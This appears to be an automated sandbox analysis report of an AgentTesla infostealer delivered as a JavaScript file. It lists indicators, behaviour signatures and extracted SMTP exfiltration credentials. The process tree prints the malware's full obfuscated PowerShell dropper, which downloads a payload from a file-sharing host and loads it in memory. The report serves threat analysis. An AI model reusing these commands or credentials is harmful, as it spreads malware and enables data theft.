agenttesla | hxxps://verametal[.]net/SAMPLE_PHOTO[.]js

Analysis

max time kernel
299s
max time network
245s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
16/11/2024, 15:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://verametal.net/SAMPLE_PHOTO.js

Score

10^/10

agenttesla discovery execution keylogger spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Extracted

Credentials

Protocol: smtp
Host:
mail.ctdi.com.ph
Port:
587
Username:
[email protected]
Password:
A#f+Y]H8iO4a

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.ctdi.com.ph
Port:
587
Username:
[email protected]
Password:
A#f+Y]H8iO4a
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Agenttesla family
agenttesla

Blocklisted process makes network request 4 IoCs

flow	pid	Process
36	2452	powershell.exe
38	2928	powershell.exe
40	2452	powershell.exe
61	2928	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
216	powershell.exe
2452	powershell.exe
1772	powershell.exe
2928	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
48	ip-api.com

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2452 set thread context of 1260	2452	powershell.exe	124
PID 2928 set thread context of 2432	2928	powershell.exe	130

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133762437487967247"	chrome.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
4112	chrome.exe
4112	chrome.exe
216	powershell.exe
216	powershell.exe
216	powershell.exe
2452	powershell.exe
2452	powershell.exe
2452	powershell.exe
1772	powershell.exe
1772	powershell.exe
1772	powershell.exe
2928	powershell.exe
2928	powershell.exe
2928	powershell.exe
1260	MSBuild.exe
1260	MSBuild.exe
1260	MSBuild.exe
2928	powershell.exe
2928	powershell.exe
2432	MSBuild.exe
2432	MSBuild.exe
2432	MSBuild.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
4112	chrome.exe
4112	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeDebugPrivilege	216	powershell.exe
Token: SeDebugPrivilege	2452	powershell.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeDebugPrivilege	1772	powershell.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeDebugPrivilege	1260	MSBuild.exe
Token: SeShutdownPrivilege	4112	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4112 wrote to memory of 1300	4112	chrome.exe	83
PID 4112 wrote to memory of 1300	4112	chrome.exe	83
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 1720	4112	chrome.exe	84
PID 4112 wrote to memory of 3940	4112	chrome.exe	85
PID 4112 wrote to memory of 3940	4112	chrome.exe	85
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86
PID 4112 wrote to memory of 4000	4112	chrome.exe	86

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://verametal.net/SAMPLE_PHOTO.js
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffcdb7ccc40,0x7ffcdb7ccc4c,0x7ffcdb7ccc58
  2⤵
  PID:1300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1716,i,7527612504146267145,3664260511126326724,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1708 /prefetch:2
  2⤵
  PID:1720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2136,i,7527612504146267145,3664260511126326724,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2160 /prefetch:3
  2⤵
  PID:3940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2224,i,7527612504146267145,3664260511126326724,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2392 /prefetch:8
  2⤵
  PID:4000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,7527612504146267145,3664260511126326724,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3144 /prefetch:1
  2⤵
  PID:5052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3124,i,7527612504146267145,3664260511126326724,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3324 /prefetch:1
  2⤵
  PID:4628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4944,i,7527612504146267145,3664260511126326724,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4972 /prefetch:8
  2⤵
  PID:2524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5000,i,7527612504146267145,3664260511126326724,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5180 /prefetch:8
  2⤵
  PID:4936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4580,i,7527612504146267145,3664260511126326724,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=724 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4888

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3156

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4380

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\SAMPLE_PHOTO.js"
1⤵
- Checks computer location settings
PID:2044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAWQBlAE4AaQBtACcAKwAnAGEAZwBlAFUAcgBsACAAPQAgADIAdAAnACsAJwBNAGgAdAB0AHAAcwA6AC8ALwAxADAAMQA3AC4AZgBpAGwAZQBtAGEAaQBsAC4AYwBvAG0ALwBhAHAAaQAvAGYAaQBsAGUALwBnAGUAdAA/AGYAaQBsAGUAawBlAHkAPQAyAEEAYQBfAGIAVwBvACcAKwAnADkAUgBlAHUANAA1AHQANwBCAFUAMQBrAFYAZwBzAGQAOQBwAFQAOQBwAGcAUwBTAGwAdgBTAHQAJwArACcARwByAG4AVABJAEMAZgBGAGgAbQBUAEsAagAzAEwAQwA2AFMAUQB0AEkAYwBPAGMAXwBUADMANQB3ACYAcABrAF8AdgBpAGQAPQBmAGQANABmADYAMQA0AGIAYgAyADAAOQBjADYAMgBjADEANwAzADAAOQA0ACcAKwAnADUAMQA3ADYAYQAwADkAMAA0AGYAIAAyAHQATQA7AFkAZQBOAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwAnACsAJwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBZAGUATgBpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAFkAZQBOAHcAJwArACcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkACcAKwAnAEQAYQB0AGEAJwArACcAKABZAGUAJwArACcATgBpAG0AYQBnAGUAVQByAGwAKQA7AFkAZQBOAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdAAnACsAJwBTAHQAcgBpAG4AZwAoAFkAZQBOAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7AFkAZQBOAHMAdABhACcAKwAnAHIAdABGAGwAYQBnACAAPQAgADIAdABNADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AMgB0AE0AJwArACcAOwBZAGUATgBlAG4AZABGAGwAYQBnACAAPQAgACcAKwAnADIAdABNADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAyAHQATQA7AFkAZQBOAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAWQBlAE4AJwArACcAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AJwArACcAZABlAHgATwBmACgAWQBlAE4AcwB0AGEAcgB0AEYAbABhAGcAKQA7AFkAZQBOAGUAbgBkAEkAbgBkAGUAeAAgAD0AIABZAGUATgBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABZAGUATgBlAG4AZAAnACsAJwBGAGwAYQBnACkAOwBZAGUATgBzAHQAYQByAHQASQBuAGQAZQB4ACcAKwAnACAALQAnACsAJwBnAGUAIAAwACAALQBhAG4AZAAgAFkAZQBOAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwAnACsAJwB0ACAAWQBlAE4AcwB0AGEAcgB0AEkAbgBkAGUAeAA7AFkAZQBOAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIABZAGUATgBzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAWQBlAE4AYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAWQBlAE4AZQBuAGQASQBuAGQAZQB4ACAALQAgAFkAZQBOAHMAdABhAHIAdABJAG4AZABlACcAKwAnAHgAOwBZAGUATgBiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgAFkAZQBOAGkAbQBhAGcAZQBUAGUAeAB0ACcAKwAnAC4AUwB1AGIAcwB0AHIAaQBuAGcAKABZAGUATgBzAHQAYQByAHQASQBuAGQAZQB4ACwAIABZAGUATgBiAGEAcwBlADYAJwArACcANABMAGUAJwArACcAbgBnAHQAaAApADsAWQBlAE4AYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAWQBlAE4AYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIABDAGoATQAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABZAGUATgBfACAAfQApAFsALQAnACsAJwAxAC4ALgAtACgAWQBlAE4AYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAEwAZQBuAGcAdABoACkAXQA7AFkAZQBOACcAKwAnAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwAnACsAJwB0AHIAaQBuAGcAKABZAGUAJwArACcATgBiAGEAcwBlADYAJwArACcANABSAGUAdgBlAHIAcwBlAGQAKQA7AFkAZQBOAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQAnACsAJwBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWQBlAE4AYwBvAG0AbQBhAG4AZABCAHkAdABlACcAKwAnAHMAKQAnACsAJwA7AFkAZQBOAHYAYQBpAE0AZQB0AGgAbwBkACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaAAnACsAJwBvAGQAKAAyACcAKwAnAHQATQBWAEEASQAyAHQATQApADsAWQBlAE4AdgBhAGkATQBlAHQAaABvAGQALgBJAG4AdgBvAGsAZQAoAFkAZQBOAG4AdQBsAGwALAAgAEAAKAAyAHQATQB0AHgAdAAuAG4AcgBlAHQAcwBlAHcALwAnACsAJwB2AGUAJwArACcAZAAuADIAcgAuADMAOQBiADMANAA1ADMAMAAyAGEAMAA3ADUAYgAxAGIAYwAwAGQANAA1AGIANgAzACcAKwAnADIAZQBiADkAZQBlADYAMgAtAGIAdQBwAC8ALwA6AHMAcAAnACsAJwB0AHQAaAAyAHQATQAsACAAMgB0AE0AZABlAHMAYQB0AGkAdgBhAGQAbwAyAHQATQAsACAAMgB0AE0AZAAnACsAJwBlAHMAYQB0AGkAdgBhAGQAbwAyAHQATQAsACAAMgB0AE0AZABlAHMAYQB0AGkAdgBhAGQAbwAyAHQATQAsACAAMgB0AE0ATQBTAEIAdQBpAGwAZAAyAHQATQAsACAAMgB0AE0AZABlAHMAYQB0AGkAdgBhAGQAbwAyAHQATQAsACAAMgB0AE0AZABlAHMAYQB0AGkAdgBhAGQAbwAyAHQATQAsADIAdABNAGQAZQBzAGEAdABpAHYAYQBkACcAKwAnAG8AMgB0AE0ALAAyAHQATQBkAGUAcwBhAHQAaQB2AGEAZABvADIAdABNACwAMgB0AE0AZABlAHMAYQB0AGkAdgBhAGQAbwAyAHQATQAnACsAJwAsADIAdABNAGQAZQBzAGEAdABpAHYAYQBkAG8AMgB0AE0ALAAyAHQATQBkAGUAcwBhAHQAaQB2AGEAZABvADIAdABNACwAMgB0AE0AMQAyAHQATQAsADIAdABNAGQAZQBzAGEAdABpAHYAYQBkAG8AMgB0AE0AKQApADsAJwApAC0AUgBlAFAAbABhAEMARQAgACAAJwAyAHQATQAnACwAWwBDAGgAQQByAF0AMwA5ACAALQBSAGUAUABsAGEAQwBFACAAKABbAEMAaABBAHIAXQA2ADcAKwBbAEMAaABBAHIAXQAxADAANgArAFsAQwBoAEEAcgBdADcANwApACwAWwBDAGgAQQByAF0AMQAyADQAIAAgAC0AUgBlAFAAbABhAEMARQAoAFsAQwBoAEEAcgBdADgAOQArAFsAQwBoAEEAcgBdADEAMAAxACsAWwBDAGgAQQByAF0ANwA4ACkALABbAEMAaABBAHIAXQAzADYAKQB8ACYAIAAoACAAJABTAGgAZQBMAGwAaQBEAFsAMQBdACsAJABTAEgAZQBsAEwAaQBEAFsAMQAzAF0AKwAnAFgAJwApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:216
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('YeNim'+'ageUrl = 2t'+'Mhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo'+'9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c173094'+'5176a0904f 2tM;YeNwebClient = New-Object Sys'+'tem.Net.WebClient;YeNimageBytes = YeNw'+'ebClient.Download'+'Data'+'(Ye'+'NimageUrl);YeNimageText = [System.Text.Encoding]::UTF8.Get'+'String(YeNimageBytes);YeNsta'+'rtFlag = 2tM<<BASE64_START>>2tM'+';YeNendFlag = '+'2tM<<BASE64_END>>2tM;YeNstartIndex = YeN'+'imageText.In'+'dexOf(YeNstartFlag);YeNendIndex = YeNimageText.IndexOf(YeNend'+'Flag);YeNstartIndex'+' -'+'ge 0 -and YeNendIndex -g'+'t YeNstartIndex;YeNstartIndex += YeNstartFlag.Length;YeNbase64Length = YeNendIndex - YeNstartInde'+'x;YeNbase64Command = YeNimageText'+'.Substring(YeNstartIndex, YeNbase6'+'4Le'+'ngth);YeNbase64Reversed = -join (YeNbase64Command.ToCharArray() CjM ForEach-Object { YeN_ })[-'+'1..-(YeNbase64Command.Length)];YeN'+'commandBytes = [System.Convert]::FromBase64S'+'tring(Ye'+'Nbase6'+'4Reversed);YeNloadedAssembly = [Syste'+'m.Reflection.Assembly]::Load(YeNcommandByte'+'s)'+';YeNvaiMethod = [dnlib.IO.Home].GetMeth'+'od(2'+'tMVAI2tM);YeNvaiMethod.Invoke(YeNnull, @(2tMtxt.nretsew/'+'ve'+'d.2r.39b345302a075b1bc0d45b63'+'2eb9ee62-bup//:sp'+'tth2tM, 2tMdesativado2tM, 2tMd'+'esativado2tM, 2tMdesativado2tM, 2tMMSBuild2tM, 2tMdesativado2tM, 